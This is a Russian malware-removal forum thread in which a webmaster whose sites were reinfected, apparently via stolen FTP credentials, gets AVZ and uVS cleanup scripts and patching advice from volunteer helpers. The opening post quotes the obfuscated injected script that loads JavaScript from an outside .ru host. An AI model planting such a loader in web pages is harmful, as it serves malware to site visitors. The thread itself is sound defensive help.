Показано с 1 по 12 из 12.

Взломали компьютер, а после сервера с сайтами (заявка № 141744)

  1. #1
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.07.2013
    Сообщений
    139
    Вес репутации
    28

    Thumbs up Взломали компьютер, а после сервера с сайтами

    Здравствуйте уважаемые форумчане!

    Проблема вот в чем.

    Недели две назад в панели вебмастера системы Яндекс, стало выскакивать сообщение о том, что один из моих сайтов, распространяет вредоносный код, но я особо не придал этому значения, так как сообщение то появлялось, то пропадало. И вот неделю назад случилась ужасная вещь, заразилось шесть моих сайтов!

    Причем расположенных на разных хостингах и соответственно серверах. После удаления вредоносного кода и смены паролей, тот самый вредоносный код снова появлялся, в течении одного-двух часов.

    Вообщем перерыв кучу информации я понял, что возможно троянский вирус крадет коды FTP соединения с моего локального(домашнего) компьютера, при заходе на сайт через FTP. Как раз месяц назад у меня кончилась лицензия на антивирус Касперского, и я не купил новый ключ (а зря).

    В общем не буду долго рассказывать что и как я делал, скажу вкратце.

    1. Проверил компьютер, с помощь утилиты от Dr. Web в безопасном режиме. Было найдено около 8-вирусов, троянов и разных нежелательных файлов.

    2. Проверил компьютер с помощью AVPTool от "Касперского". Нашел еще трех троянов.

    3. После чего удалил Касперского без ключа, и установил Eset NOD32. И нашел еще четыре трояна и пару десятков подозрительных файлов (я их удалил на всякий пожарный, т.к. они были не системные и на работу ПК особо не влияли). У NOD32 хороший эврестический анализ, поэтому я скачал зараженный сайт с сервера себе на компьютер проверил нодом, и нашел еще один троян(хотя искал совсем не его).

    В общем после всего этого, я еще раз поменял все пароли, и на одном хостинге вроде вирус ушел (прошли уже сутки, обычно за это время вредоносный код уже возвращался). А вот на втором ни в какую.

    Возможно есть еще какой-то вирус, который ворует мои коды, но почему-то антивирусники его не находят. Проверил все по вашей инструкции - http://virusinfo.info/content.php?r=136-pravila

    Файлы логов выкладываю во вложениях.


    P.S. Кстати код который подзагружается в один из файлов сайта выглядит так, может кто знает как его побороть

    <script>;document.write('<s'+'c'+'ript sr'+'c=h'+'tt'+'p://por'+'nite'+'rnns.r'+'u/8'+'1.j'+'s></sc'+'ri'+'pt>');</script

    Помогите пожалуйста.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,460
    Вес репутации
    342
    Уважаемый(ая) teropiuty, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,584
    Вес репутации
    836
    Выполните скрипт в AVZ:
    Код:
    begin
    SearchRootkit(true, true);
     DeleteService('RelevantKnowledge');
     DeleteFile('C:\Users\Я\AppData\Roaming\Microsoft\Gsogom.exe');
     DeleteFile('C:\Users\Я\AppData\Roaming\Microsoft\Zsogof.exe');
    ExecuteSysClean;
    ExecuteRepair(3);
    ExecuteRepair(4);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    Сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  5. #4
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.07.2013
    Сообщений
    139
    Вес репутации
    28
    Благодарю за ответ.

    Все сделал, как вы сказали. Файл лога прикрепляю.

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,584
    Вес репутации
    836
    Выполните скрипт в uVS:
    Код:
    ;uVS v3.80.12 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.0
    
    delref HTTP://WEBALTA.RU
    delref HTTP://WWW.DELTA-SEARCH.COM/?AFFID=119357&BABSRC=HP_SS&MNTRID=88F8001D7DD2C19A
    exec MsiExec.exe /quiet /I{86D4B82A-ABED-442A-BE86-96357B70F4FE}
    exec MsiExec.exe /quiet /X{26A24AE4-039D-4CA4-87B4-2F83217017FF}
    exec MsiExec.exe /quiet /X{26A24AE4-039D-4CA4-87B4-2F83216031FF}
    exec MsiExec.exe /quiet /I{3248F0A8-6813-11D6-A77B-00B0D0160070}
    uidel C:\Program Files\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge
    deltmp
    restart
    Компьютер перезагрузится.

    information

    Уведомление

    Данный скрипт удалит все устаревшие версии Java, т. к. в них имеются критические ошибки, позволяющие выполнить вредоносный код в целевой системе. Проще говоря - при заходе на сайт с вредоносным кодом внедрить в систему без ведома пользователя трояна.
    Если Java нужна, т.е. без неё не работают какие-либо сайты, онлайн-игры и т. п., скачайте и установите Java 7 Update 25. Для большинства сайтов Java не нужна и является потенциальной дырой в безопасности.




    Выполните скрипт в AVZ при наличии доступа в интернет:
    Код:
    var
    LogPath : string;
    ScriptPath : string;
    
    begin
     LogPath := GetAVZDirectory + 'log\avz_log.txt';
     if FileExists(LogPath) Then DeleteFile(LogPath);
     ScriptPath := GetAVZDirectory +'ScanVuln.txt';
    
      if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
        if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
           ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
           exit;
          end;
      end;
     if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
    end.
    После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к броузерам, Java, Adobe Acrobat/Reader и Adobe Flash Player.
    WBR,
    Vadim

  7. #6
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.07.2013
    Сообщений
    139
    Вес репутации
    28
    Я пока ничего не выполнил. Появилась другая проблема. Память да диске С (системном диске) куда-то делать гигабайт 20 сразу.

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,584
    Вес репутации
    836
    Так выполните, места свободного прибавится.
    WBR,
    Vadim

  9. #8
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.07.2013
    Сообщений
    139
    Вес репутации
    28
    Все сделал как вы сказали, память и правду отчистилась. Единственное что, после выполнения скрипта для uVS, и перезагрузки, никакого файла с префиксом ZOO_ не появилось.

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,584
    Вес репутации
    836
    И не должно было появиться.
    Устраняйте уязвимости.
    WBR,
    Vadim

  11. #10
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.07.2013
    Сообщений
    139
    Вес репутации
    28
    Уязвимости устранил. Из было всего три:

    Код:
    Уязвимость в MSXML делает возможным удаленное выполнение кода
    http://www.microsoft.com/downloads/details.aspx?FamilyID=1e2738b9-d3c2-4dfe-8a79-335d5feee55b
    Запускайте обновление от имени Администратора
    
    Множественные уязвимости в Java JDK и JRE (32-разрядная версия). Деинсталлируйте старую версию и установите новую:
    http://www.java.com/ru/download/manual_v6.jsp
    
    Opera 11.50 устарела. Удалите её или установите новую
    http://www.opera.com/browser/download

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    26,584
    Вес репутации
    836
    WBR,
    Vadim

  13. #12
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    10.07.2013
    Сообщений
    139
    Вес репутации
    28
    Благодарю за помощь. Пока что все работает отлично.

  • Уважаемый(ая) teropiuty, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Ответов: 0
      Последнее сообщение: 16.05.2013, 11:01
    2. Ответов: 14
      Последнее сообщение: 27.04.2009, 14:13
    3. Ответов: 2
      Последнее сообщение: 10.11.2008, 15:54

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00725 seconds with 16 queries